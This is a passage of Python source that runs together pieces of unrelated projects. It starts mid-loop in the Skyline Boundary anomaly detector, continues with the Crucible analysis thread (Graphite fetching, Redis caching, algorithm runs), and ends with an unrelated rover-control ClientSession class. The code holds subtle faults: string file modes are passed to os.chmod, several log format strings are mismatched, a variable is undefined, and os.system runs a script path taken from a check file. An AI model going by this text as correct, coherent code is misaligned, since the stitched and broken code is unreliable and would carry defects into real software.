(len(boundary_metrics) - sum(exceptions.values()))) logger.info('total anomalies :: %d' % len(self.anomalous_metrics)) logger.info('exception stats :: %s' % exceptions) logger.info('anomaly breakdown :: %s' % anomaly_breakdown) # Log to Graphite self.send_graphite_metric('skyline.boundary.' + SERVER_METRIC_PATH + 'run_time', '%.2f' % (time() - now)) self.send_graphite_metric('skyline.boundary.' + SERVER_METRIC_PATH + 'total_analyzed', '%.2f' % (len(boundary_metrics) - sum(exceptions.values()))) self.send_graphite_metric('skyline.boundary.' + SERVER_METRIC_PATH + 'total_anomalies', '%d' % len(self.anomalous_metrics)) self.send_graphite_metric('skyline.boundary.' + SERVER_METRIC_PATH + 'total_metrics', '%d' % len(boundary_metrics)) for key, value in exceptions.items(): send_metric = 'skyline.boundary.' + SERVER_METRIC_PATH + 'exceptions.%s' % key self.send_graphite_metric(send_metric, '%d' % value) for key, value in anomaly_breakdown.items(): send_metric = 'skyline.boundary.' + SERVER_METRIC_PATH + 'anomaly_breakdown.%s' % key self.send_graphite_metric(send_metric, '%d' % value) # Check canary metric raw_series = self.redis_conn.get(settings.FULL_NAMESPACE + settings.CANARY_METRIC) if raw_series is not None: unpacker = Unpacker(use_list=False) unpacker.feed(raw_series) timeseries = list(unpacker) time_human = (timeseries[-1][0] - timeseries[0][0]) / 3600 projected = 24 * (time() - now) / time_human logger.info('canary duration :: %.2f' % time_human) self.send_graphite_metric('skyline.boundary.' + SERVER_METRIC_PATH + 'duration', '%.2f' % time_human) self.send_graphite_metric('skyline.boundary.' + SERVER_METRIC_PATH + 'projected', '%.2f' % projected) # Reset counters self.anomalous_metrics[:] = [] # Only run once per minute seconds_to_run = int((time() - now)) if seconds_to_run < 60: sleep_for_seconds = 60 - seconds_to_run else: sleep_for_seconds = 0 if sleep_for_seconds > 0: logger.info('sleeping for %s seconds' % sleep_for_seconds) sleep(sleep_for_seconds)
class Crucible(Thread): def __init__(self, parent_pid): """ Initialize Crucible """ super(Crucible, self).__init__() self.daemon = True self.parent_pid = parent_pid self.current_pid = getpid() self.process_list = Manager().list() self.metric_variables = Manager().list() self.redis_conn = StrictRedis(unix_socket_path=settings.REDIS_SOCKET_PATH) def check_if_parent_is_alive(self): """ Check if the parent process is alive """ try: kill(self.current_pid, 0) kill(self.parent_pid, 0) except: exit(0) def spin_process(self, i, run_timestamp, metric_check_file): """ Assign a metric for a process to analyze. :param i: python process id :param run_timestamp: the epoch timestamp at which this process was called :param metric_check_file: full path to the metric check file :return: returns True """ child_process_pid = os.getpid() if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('child_process_pid - %s' % str(child_process_pid)) self.process_list.append(child_process_pid) if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('processing metric check - %s' % metric_check_file) if not os.path.isfile(str(metric_check_file)): logger.error('error :: file not found - metric_check_file - %s' % (str(metric_check_file))) return check_file_name = os.path.basename(str(metric_check_file)) if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('check_file_name - %s' % check_file_name) check_file_timestamp = check_file_name.split('.', 1)[0] if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('check_file_timestamp - %s' % str(check_file_timestamp)) check_file_metricname_txt = check_file_name.split('.', 1)[1] if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('check_file_metricname_txt - %s' % check_file_metricname_txt) check_file_metricname = check_file_metricname_txt.replace('.txt', '') if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('check_file_metricname - %s' % check_file_metricname) check_file_metricname_dir = check_file_metricname.replace('.', '/') if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('check_file_metricname_dir - %s' % check_file_metricname_dir) metric_failed_check_dir = failed_checks_dir + '/' + check_file_metricname_dir + '/' + check_file_timestamp if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('metric_failed_check_dir - %s' % metric_failed_check_dir) # failed_check_file = failed_checks_dir + '/' + check_file_name failed_check_file = metric_failed_check_dir + '/' + check_file_name # Load and validate metric variables try: metric_vars = load_metric_vars(skyline_app, str(metric_check_file)) except: logger.error('error :: failed to import metric variables from check file - %s' % (metric_check_file)) fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file)) # TBD - a failed check Panorama update will go here, perhaps txt # files are not the only "queue" that will be used, both, but # Panorama, may be just a part of Skyline Flux, the flux DB # would allow for a very nice, distributed "queue" and a # distributed Skyline workforce... # Any Skyline node could just have one role, e.g. lots of # Skyline nodes running crucible only and instead of reading # the local filesystem for input, they could read the Flux DB # queue or both... return # Test metric variables # We use a pythonic methodology to test if the variables are defined, # this ensures that if any of the variables are not set for some reason # we can handle unexpected data or situations gracefully and try and # ensure that the process does not hang. # if len(str(metric_vars.metric)) == 0: # if not metric_vars.metric: try: metric_vars.metric except: logger.error('error :: failed to read metric variable from check file - %s' % (metric_check_file)) fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file)) return else: metric = str(metric_vars.metric) if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('metric variable - metric - %s' % metric) # if len(metric_vars.value) == 0: # if not metric_vars.value: try: metric_vars.value except: logger.error('error :: failed to read value variable from check file - %s' % (metric_check_file)) fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file)) return else: value = str(metric_vars.value) if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('metric variable - value - %s' % (value)) # if len(metric_vars.from_timestamp) == 0: # if not metric_vars.from_timestamp: try: metric_vars.from_timestamp except: logger.error('error :: failed to read from_timestamp variable from check file - %s' % (metric_check_file)) fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file)) return else: from_timestamp = str(metric_vars.from_timestamp) if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('metric variable - from_timestamp - %s' % from_timestamp) # if len(metric_vars.metric_timestamp) == 0: # if not metric_vars.metric_timestamp: try: metric_vars.metric_timestamp except: logger.error('error :: failed to read metric_timestamp variable from check file - %s' % (metric_check_file)) fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file)) return else: metric_timestamp = str(metric_vars.metric_timestamp) if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('metric variable - metric_timestamp - %s' % metric_timestamp) # if len(metric_vars.algorithms) == 0: # if not metric_vars.algorithms: try: metric_vars.algorithms except: logger.error('error :: failed to read algorithms variable from check file setting to all' % (metric_check_file)) algorithms = ['all'] else: algorithms = [] for i_algorithm in metric_vars.algorithms: algorithms.append(i_algorithm) if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('metric variable - algorithms - %s' % algorithms) # if len(metric_vars.anomaly_dir) == 0: # if not metric_vars.anomaly_dir: try: metric_vars.anomaly_dir except: logger.error('error :: failed to read anomaly_dir variable from check file - %s' % (metric_check_file)) fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file)) return else: anomaly_dir = str(metric_vars.anomaly_dir) if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('metric variable - anomaly_dir - %s' % anomaly_dir) # if len(str(metric_vars.graphite_metric)) == 0: try: metric_vars.graphite_metric except: logger.info('failed to read graphite_metric variable from check file setting to False') # yes this is a string graphite_metric = 'False' else: graphite_metric = str(metric_vars.graphite_metric) if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('metric variable - graphite_metric - %s' % graphite_metric) # if len(str(metric_vars.run_crucible_tests)) == 0: try: metric_vars.run_crucible_tests except: logger.info('failed to read run_crucible_tests variable from check file setting to False') # yes this is a string run_crucible_tests = 'False' else: run_crucible_tests = str(metric_vars.run_crucible_tests) if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('metric variable - run_crucible_tests - %s' % run_crucible_tests) try: metric_vars.added_by except: if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('failed to read added_by variable from check file setting to crucible - set to crucible') added_by = 'crucible' else: added_by = str(metric_vars.added_by) if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('metric variable - added_by - %s' % added_by) try: metric_vars.run_script except: run_script = False if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('metric variable - run_script - not present set to False') else: run_script = str(metric_vars.run_script) if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('metric variable - run_script - %s' % run_script) # Only check if the metric does not a EXPIRATION_TIME key set, crucible # uses the alert EXPIRATION_TIME for the relevant alert setting contexts # whether that be analyzer, mirage, boundary, etc and sets its own # cache_keys in redis. This prevents large amounts of data being added # in terms of tieseries json and image files, crucible samples at the # same EXPIRATION_TIME as alerts. source_app = 'crucible' expiration_timeout = 1800 remove_all_anomaly_files = False check_expired = False check_time = time() if added_by == 'analyzer' or added_by == 'mirage': if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('Will check %s ALERTS' % added_by) if settings.ENABLE_ALERTS: if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('Checking %s ALERTS' % added_by) for alert in settings.ALERTS: ALERT_MATCH_PATTERN = alert[0] METRIC_PATTERN = metric alert_match_pattern = re.compile(ALERT_MATCH_PATTERN) pattern_match = alert_match_pattern.match(METRIC_PATTERN) if pattern_match: source_app = added_by expiration_timeout = alert[2] if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('matched - %s - %s - EXPIRATION_TIME is %s' % (source_app, metric, str(expiration_timeout))) check_age = int(check_time) - int(metric_timestamp) if int(check_age) > int(expiration_timeout): check_expired = True if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('the check is older than EXPIRATION_TIME for the metric - not checking - check_expired') if added_by == 'boundary': if settings.BOUNDARY_ENABLE_ALERTS: for alert in settings.BOUNDARY_METRICS: ALERT_MATCH_PATTERN = alert[0] METRIC_PATTERN = metric alert_match_pattern = re.compile(ALERT_MATCH_PATTERN) pattern_match = alert_match_pattern.match(METRIC_PATTERN) if pattern_match: source_app = 'boundary' expiration_timeout = alert[2] if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('matched - %s - %s - EXPIRATION_TIME is %s' % (source_app, metric, str(expiration_timeout))) check_age = int(check_time) - int(metric_timestamp) if int(check_age) > int(expiration_timeout): check_expired = True if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('the check is older than EXPIRATION_TIME for the metric - not checking - check_expired') cache_key = 'crucible.last_check.%s.%s' % (source_app, metric) if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('cache_key - crucible.last_check.%s.%s' % (source_app, metric)) # Only use the cache_key EXPIRATION_TIME if this is not a request to # run_crucible_tests on a timeseries if run_crucible_tests == 'False': if check_expired: logger.info('check_expired - not checking Redis key') last_check = True else: if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('Checking if cache_key exists') try: last_check = self.redis_conn.get(cache_key) except Exception as e: logger.error('error :: could not query cache_key for %s - %s - %s' % (alerter, metric, e)) logger.info('all anomaly files will be removed') remove_all_anomaly_files = True if not last_check: try: self.redis_conn.setex(cache_key, expiration_timeout, packb(value)) logger.info('set cache_key for %s - %s with timeout of %s' % (source_app, metric, str(expiration_timeout))) except Exception as e: logger.error('error :: could not query cache_key for %s - %s - %s' % (alerter, metric, e)) logger.info('all anomaly files will be removed') remove_all_anomaly_files = True else: if check_expired: logger.info('check_expired - all anomaly files will be removed') remove_all_anomaly_files = True else: logger.info('cache_key is set and not expired for %s - %s - all anomaly files will be removed' % (source_app, metric)) remove_all_anomaly_files = True # anomaly dir if not os.path.exists(str(anomaly_dir)): try: mkdir_p(skyline_app, str(anomaly_dir)) if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('created anomaly dir - %s' % str(anomaly_dir)) except: logger.error('error :: failed to create anomaly_dir - %s' % str(anomaly_dir)) if not os.path.exists(str(anomaly_dir)): logger.error('error :: anomaly_dir does not exist') fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file)) return else: if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('anomaly dir exists - %s' % str(anomaly_dir)) failed_check_file = anomaly_dir + '/' + metric_timestamp + '.failed.check.' + metric + '.txt' if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('failed_check_file - %s' % str(failed_check_file)) # Retrieve data from graphite is necessary anomaly_graph = anomaly_dir + '/' + metric + '.png' anomaly_json = anomaly_dir + '/' + metric + '.json' anomaly_json_gz = anomaly_json + '.gz' if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('anomaly_graph - %s' % str(anomaly_graph)) logger.info('anomaly_json - %s' % str(anomaly_json)) logger.info('anomaly_json_gz - %s' % str(anomaly_json_gz)) # Some things added to crucible may not be added by a skyline app per se # and if run_crucible_tests is string True then no anomaly files should # be removed. if run_crucible_tests == 'True': remove_all_anomaly_files = False # Remove check and anomaly files if the metric has a EXPIRATION_TIME # cache_key set if remove_all_anomaly_files: if os.path.isfile(anomaly_graph): try: os.remove(anomaly_graph) if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('anomaly_graph removed - %s' % str(anomaly_graph)) except OSError: pass if os.path.isfile(anomaly_json): try: os.remove(anomaly_json) if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('anomaly_json removed - %s' % str(anomaly_json)) except OSError: pass if os.path.isfile(anomaly_json_gz): try: os.remove(anomaly_json_gz) if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('anomaly_json_gz removed - %s' % str(anomaly_json_gz)) except OSError: pass anomaly_txt_file = anomaly_dir + '/' + metric + '.txt' if os.path.isfile(anomaly_txt_file): try: os.remove(anomaly_txt_file) if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('anomaly_txt_file removed - %s' % str(anomaly_txt_file)) except OSError: pass # TBD - this data would have to be added to the panaorama DB before # it is removed if os.path.isfile(str(metric_check_file)): try: os.remove(str(metric_check_file)) if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('metric_check_file removed - %s' % str(metric_check_file)) except OSError: pass if os.path.exists(str(anomaly_dir)): try: os.rmdir(str(anomaly_dir)) if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('anomaly_dir removed - %s' % str(anomaly_dir)) except OSError: pass logger.info('check and anomaly files removed') return # Check if the image exists if graphite_metric == 'True': if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('graphite_metric - %s' % (graphite_metric)) # Graphite timeouts connect_timeout = int(settings.GRAPHITE_CONNECT_TIMEOUT) if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('connect_timeout - %s' % str(connect_timeout)) read_timeout = int(settings.GRAPHITE_READ_TIMEOUT) if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('read_timeout - %s' % str(read_timeout)) graphite_until = datetime.datetime.fromtimestamp(int(metric_timestamp)).strftime('%H:%M_%Y%m%d') graphite_from = datetime.datetime.fromtimestamp(int(from_timestamp)).strftime('%H:%M_%Y%m%d') # graphite URL if settings.GRAPHITE_PORT != '': url = settings.GRAPHITE_PROTOCOL + '://' + settings.GRAPHITE_HOST + ':' + settings.GRAPHITE_PORT + '/render/?from=' + graphite_from + '&until=' + graphite_until + '&target=' + metric + '&format=json' else: url = settings.GRAPHITE_PROTOCOL + '://' + settings.GRAPHITE_HOST + '/render/?from=' + graphite_from + '&until=' + graphite_until + '&target=' + metric + '&format=json' if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('graphite url - %s' % (url)) if not os.path.isfile(anomaly_graph): logger.info('retrieving png - surfacing %s graph from graphite from %s to %s' % (metric, graphite_from, graphite_until)) image_url = url.replace('&format=json', '') graphite_image_file = anomaly_dir + '/' + metric + '.png' if 'width' not in image_url: image_url += '&width=586' if 'height' not in image_url: image_url += '&height=308' if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('graphite image url - %s' % (image_url)) image_url_timeout = int(connect_timeout) image_data = None try: image_data = urllib2.urlopen(image_url, timeout=image_url_timeout).read() logger.info('url OK - %s' % (image_url)) except urllib2.URLError: image_data = None logger.error('error :: url bad - %s' % (image_url)) if image_data is not None: with open(graphite_image_file, 'w') as f: f.write(image_data) logger.info('retrieved - %s' % (anomaly_graph)) if python_version == 2: mode_arg = int('0644') if python_version == 3: mode_arg = '0o644' os.chmod(graphite_image_file, mode_arg) else: logger.error('error :: failed to retrieved - %s' % (anomaly_graph)) else: if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('anomaly_graph file exists - %s' % str(anomaly_graph)) if not os.path.isfile(anomaly_graph): logger.error('error :: retrieve failed to surface %s graph from graphite' % (metric)) else: logger.info('graph image exists - %s' % (anomaly_graph)) # Check if the json exists if not os.path.isfile(anomaly_json_gz): if not os.path.isfile(anomaly_json): logger.info('surfacing timeseries data for %s from graphite from %s to %s' % (metric, graphite_from, graphite_until)) if requests.__version__ >= '2.4.0': use_timeout = (int(connect_timeout), int(read_timeout)) else: use_timeout = int(connect_timeout) if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('use_timeout - %s' % (str(use_timeout))) try: r = requests.get(url, timeout=use_timeout) js = r.json() datapoints = js[0]['datapoints'] if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('data retrieved OK') except: datapoints = [[None, int(graphite_until)]] logger.error('error :: data retrieval failed') converted = [] for datapoint in datapoints: try: new_datapoint = [float(datapoint[1]), float(datapoint[0])] converted.append(new_datapoint) except: continue with open(anomaly_json, 'w') as f: f.write(json.dumps(converted)) if python_version == 2: mode_arg = int('0644') if python_version == 3: mode_arg = '0o644' os.chmod(anomaly_json, mode_arg) if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('json file - %s' % anomaly_json) if not os.path.isfile(anomaly_json): logger.error('error :: failed to surface %s json from graphite' % (metric)) # Move metric check file try: shutil.move(metric_check_file, failed_check_file) logger.info('moved check file to - %s' % failed_check_file) except OSError: logger.error('error :: failed to move check file to - %s' % failed_check_file) pass return # Check timeseries json exists - raw or gz if not os.path.isfile(anomaly_json): if not os.path.isfile(anomaly_json_gz): logger.error('error :: no json data found' % (metric)) # Move metric check file try: shutil.move(metric_check_file, failed_check_file) logger.info('moved check file to - %s' % failed_check_file) except OSError: logger.error('error :: failed to move check file to - %s' % failed_check_file) pass return else: logger.info('timeseries json gzip exists - %s' % (anomaly_json_gz)) else: logger.info('timeseries json exists - %s' % (anomaly_json)) # If timeseries json and run_crucible_tests is str(False) gzip and # return here as there is nothing further to do if run_crucible_tests == 'False': if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('run_crucible_tests - %s' % run_crucible_tests) # gzip the json timeseries data if os.path.isfile(anomaly_json): if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('gzipping - %s' % anomaly_json) try: f_in = open(anomaly_json) f_out = gzip.open(anomaly_json_gz, 'wb') f_out.writelines(f_in) f_out.close() f_in.close() os.remove(anomaly_json) if python_version == 2: mode_arg = int('0644') if python_version == 3: mode_arg = '0o644' os.chmod(anomaly_json_gz, mode_arg) if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('gzipped - %s' % anomaly_json_gz) try: os.remove(metric_check_file) logger.info('removed check file - %s' % metric_check_file) except OSError: pass return except: logger.error('error :: Failed to gzip data file - %s' % str(traceback.print_exc())) try: os.remove(metric_check_file) logger.info('removed check file - %s' % metric_check_file) except OSError: pass return if os.path.isfile(anomaly_json_gz): if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('gzip exists - %s' % anomaly_json) try: os.remove(metric_check_file) logger.info('removed check file - %s' % metric_check_file) except OSError: pass return nothing_to_do = 'true - for debug only' # self.check_if_parent_is_alive() # Run crucible algorithms logger.info('running crucible tests - %s' % (metric)) timeseries_dir = metric.replace('.', '/') if os.path.isfile(anomaly_json_gz): if not os.path.isfile(anomaly_json): if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('ungzipping - %s' % anomaly_json_gz) try: # with gzip.open(anomaly_json_gz, 'rb') as fr: fr = gzip.open(anomaly_json_gz, 'rb') raw_timeseries = fr.read() fr.close() except Exception as e: logger.error('error :: could not ungzip %s - %s' % (anomaly_json_gz, e)) traceback.print_exc() if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('ungzipped') logger.info('writing to - %s' % anomaly_json) with open(anomaly_json, 'w') as fw: fw.write(raw_timeseries) if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('anomaly_json done') if python_version == 2: mode_arg = int('0644') if python_version == 3: mode_arg = '0o644' os.chmod(anomaly_json, mode_arg) else: if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('No gzip - %s' % anomaly_json_gz) nothing_to_do = 'true - for debug only' if os.path.isfile(anomaly_json): if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('anomaly_json exists - %s' % anomaly_json) if os.path.isfile(anomaly_json): if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('loading timeseries from - %s' % anomaly_json) with open(anomaly_json, 'r') as f: timeseries = json.loads(f.read()) if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('loaded timeseries from - %s' % anomaly_json) else: try: logger.error('error :: file not found - %s' % anomaly_json) shutil.move(metric_check_file, failed_check_file) if python_version == 2: mode_arg = int('0644') if python_version == 3: mode_arg = '0o644' os.chmod(failed_check_file, mode_arg) logger.info('moved check file to - %s' % failed_check_file) except OSError: logger.error('error :: failed to move check file to - %s' % failed_check_file) pass return start_timestamp = int(timeseries[0][0]) if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('start_timestamp - %s' % str(start_timestamp)) end_timestamp = int(timeseries[-1][0]) if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('end_timestamp - %s' % str(end_timestamp)) full_duration = end_timestamp - start_timestamp if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('full_duration - %s' % str(full_duration)) self.check_if_parent_is_alive() run_algorithms_start_timestamp = int(time()) if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('run_algorithms_start_timestamp - %s' % str(run_algorithms_start_timestamp)) if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('run_algorithms - %s,%s,%s,%s,%s,%s' % (metric, str(end_timestamp), str(full_duration), anomaly_json, skyline_app, str(algorithms))) try: anomalous, ensemble = run_algorithms(timeseries, str(metric), end_timestamp, full_duration, str(anomaly_json), skyline_app, algorithms) except: logger.error('error :: run_algorithms failed - %s' % str(traceback.print_exc())) run_algorithms_end_timestamp = int(time()) run_algorithms_seconds = run_algorithms_end_timestamp - run_algorithms_start_timestamp if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('anomalous, ensemble - %s, %s' % (anomalous, str(ensemble))) if anomalous: if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('anomalous - %s' % (anomalous)) nothing_to_do = 'true - for debug only' logger.info('run_algorithms took %s seconds' % str(run_algorithms_seconds)) # Update anomaly file crucible_data = 'crucible_tests_run = "%s"\n' \ 'crucible_triggered_algorithms = %s\n' \ 'tested_by = "%s"\n' \ % (str(run_timestamp), str(ensemble), str(this_host)) crucible_anomaly_file = '%s/%s.txt' % (anomaly_dir, metric) with open(crucible_anomaly_file, 'a') as fh: fh.write(crucible_data) if python_version == 2: mode_arg = int('0644') if python_version == 3: mode_arg = '0o644' os.chmod(crucible_anomaly_file, mode_arg) logger.info('updated crucible anomaly file - %s/%s.txt' % (anomaly_dir, metric)) # gzip the json timeseries data after analysis if os.path.isfile(anomaly_json): if not os.path.isfile(anomaly_json_gz): try: f_in = open(anomaly_json) f_out = gzip.open(anomaly_json_gz, 'wb') f_out.writelines(f_in) f_out.close() f_in.close() os.remove(anomaly_json) if python_version == 2: mode_arg = int('0644') if python_version == 3: mode_arg = '0o644' os.chmod(anomaly_json_gz, mode_arg) logger.info('gzipped - %s' % (anomaly_json_gz)) except: logger.error('error :: Failed to gzip data file - %s' % str(traceback.print_exc())) else: os.remove(anomaly_json) if run_script: if os.path.isfile(run_script): logger.info('running - %s' % (run_script)) os.system('%s %s' % (str(run_script), str(crucible_anomaly_file))) # Remove metric check file try: os.remove(metric_check_file) logger.info('complete removed check file - %s' % (metric_check_file)) except OSError: pass def run(self): """ Called when the process intializes. """ # Log management to prevent overwriting # Allow the bin/<skyline_app>.d to manage the log if os.path.isfile(skyline_app_logwait): try: os.remove(skyline_app_logwait) except OSError: logger.error('error - failed to remove %s, continuing' % skyline_app_logwait) pass now = time() log_wait_for = now + 5 while now < log_wait_for: if os.path.isfile(skyline_app_loglock): sleep(.1) now = time() else: now = log_wait_for + 1 logger.info('starting %s run' % skyline_app) if os.path.isfile(skyline_app_loglock): logger.error('error - bin/%s.d log management seems to have failed, continuing' % skyline_app) try: os.remove(skyline_app_loglock) logger.info('log lock file removed') except OSError: logger.error('error - failed to remove %s, continuing' % skyline_app_loglock) pass else: logger.info('bin/%s.d log management done' % skyline_app) logger.info('process intialized') while 1: now = time() if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('process started - %s' % int(now)) # Make sure check_dir exists and has not been removed try: if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('checking check dir exists - %s' % settings.CRUCIBLE_CHECK_PATH) os.path.exists(settings.CRUCIBLE_CHECK_PATH) except: logger.error('error :: check dir did not exist - %s' % settings.CRUCIBLE_CHECK_PATH) if python_version == 2: mode_arg = int('0755') if python_version == 3: mode_arg = mode=0o755 os.makedirs(settings.CRUCIBLE_CHECK_PATH, mode_arg) logger.info('check dir created - %s' % settings.CRUCIBLE_CHECK_PATH) os.path.exists(settings.CRUCIBLE_CHECK_PATH) # continue # Make sure Redis is up try: self.redis_conn.ping() logger.info('connected to redis at socket path %s' % settings.REDIS_SOCKET_PATH) except: logger.info('skyline can not connect to redis at socket path %s' % settings.REDIS_SOCKET_PATH) sleep(10) logger.info('connecting to redis at socket path %s' % settings.REDIS_SOCKET_PATH) self.redis_conn = StrictRedis(unix_socket_path=settings.REDIS_SOCKET_PATH) continue """ Determine if any metric has been added to test """ while True: # Report app up self.redis_conn.setex(skyline_app, 120, now) metric_var_files = [f for f in listdir(settings.CRUCIBLE_CHECK_PATH) if isfile(join(settings.CRUCIBLE_CHECK_PATH, f))] # if len(metric_var_files) == 0: if not metric_var_files: logger.info('sleeping 10 no metric check files') sleep(10) # Discover metric to analyze metric_var_files = '' metric_var_files = [f for f in listdir(settings.CRUCIBLE_CHECK_PATH) if isfile(join(settings.CRUCIBLE_CHECK_PATH, f))] # if len(metric_var_files) > 0: if metric_var_files: break metric_var_files_sorted = sorted(metric_var_files) metric_check_file = settings.CRUCIBLE_CHECK_PATH + "/" + str(metric_var_files_sorted[0]) logger.info('assigning check for processing - %s' % str(metric_var_files_sorted[0])) # Reset process_list self.process_list[:] = [] # Spawn processes pids = [] spawned_pids = [] pid_count = 0 run_timestamp = int(now) for i in range(1, CRUCIBLE_PROCESSES + 1): p = Process(target=self.spin_process, args=(i, run_timestamp, str(metric_check_file))) pids.append(p) pid_count += 1 logger.info('starting %s of %s spin_process/es' % (str(pid_count), str(settings.CRUCIBLE_PROCESSES))) p.start() spawned_pids.append(p.pid) # Send wait signal to zombie processes # for p in pids: # p.join() # Self monitor processes and terminate if any spin_process has run # for longer than CRUCIBLE_TESTS_TIMEOUT p_starts = time() while time() - p_starts <= settings.CRUCIBLE_TESTS_TIMEOUT: if any(p.is_alive() for p in pids): # Just to avoid hogging the CPU sleep(.1) else: # All the processes are done, break now. time_to_run = time() - p_starts logger.info('%s :: %s spin_process/es completed in %.2f seconds' % (skyline_app, str(settings.CRUCIBLE_PROCESSES), time_to_run)) break else: # We only enter this if we didn't 'break' above. logger.info('%s :: timed out, killing all spin_process processes' % (skyline_app)) for p in pids: p.terminate() p.join() while os.path.isfile(metric_check_file): sleep(1)
class ClientSession(): """ Manager object that manages the other subprocesses (comms, commands) and interfaces the GUI. This is NOT a process !""" def __init__(self,cfg,**kwargs): ##### Fetch basic args ###### self.cfg = cfg ### log queue is provided by the caller self.queue_log = kwargs['queue_log'] self.queue_console = kwargs['queue_console'] ################################ ### Session logic objects ################################ self.dict_dispatch_rx = {} self.rover_status = {'headlights':False, \ 'speed':0,\ 'battery':100.0,\ 'list_audio_files':[]} ################################ ### Rover control objects ################################ self.dict_rover_drive = {'stop':'DG5',\ 'north':'DG8',\ 'north_east':'DG9',\ 'east':'DG6', \ 'south_east':'DG3', \ 'south':'DG2', \ 'south_west':'DG1', \ 'west':'DG4', \ 'north_west':'DG7'} def init_multiprocessing(self): ######### Multiprocessing ######### self.events = {} self.pipes = {} self.locks = {} self.queues = {} self.managers = {} ######## Events/Sync ######### self.pipes['comms'] = Pipe() self.queues['cmd'] = JoinableQueue() self.queues['rx'] = JoinableQueue() self.queues['tx'] = JoinableQueue() self.queues['log'] = self.queue_log self.managers['videoframes'] = Manager().list() self.events['comms_enable'] = Event() self.events['comms_server_disconnect'] = Event() self.drive_lifo = Manager().list() ############################## ### Processes ############################## #### Video : #### #self.videoproc = VideoProcess() #### Comms : #### self.commprocess = CommProcess(events={'enable':self.events['comms_enable'], 'server_disconnect':self.events['comms_server_disconnect']}, \ queues={'log':self.queues['log'],'tx':self.queues['tx'], 'rx':self.queues['rx']},\ pipes={'session':self.pipes['comms'][1]}, \ tx_lifo=self.drive_lifo, rover_address=self.cfg.network.address,\ rover_port_command=self.cfg.network.port_command) ################################# ## Logging / support ################################# def queue_to_log(self, msg): self.queues['log'].put(msg) def queue_to_console(self, msg): self.queue_console.put(msg) def queue_to_log_and_console(self, msg): self.queue_to_log(msg) self.queue_to_console(msg) ################################# ## COMMS METHODS ################################# def comms_launch_process(self): try: self.commprocess.start() except Exception as e: msg= 'error:could not launch Comms process : %s\n'%e self.queue_to_log(msg) self.events['comms_server_disconnect'].set() return False, msg msg = 'Comms process successfully launched.\n' return True, msg def comms_flush_rxtx_queues(self): while self.queues['rx'].empty()==False: self.queues['rx'].get() while self.queues['tx'].empty()==False: self.queues['tx'].get() def comms_enable(self): msg = 'Attempting connection to rover (%s,%s) ...\n'%(self.cfg.network.address,self.cfg.network.port_command) self.events['comms_enable'].set() ### Wait for status update from commprocess : result, msg = self.pipes['comms'][0].recv() if result == True: msg = 'Successfully connected to rover.\n' retbool = True else: msg = 'Error:could not connect to rover: %s\n'%msg.strip() self.events['comms_enable'].clear() retbool = False return retbool, msg 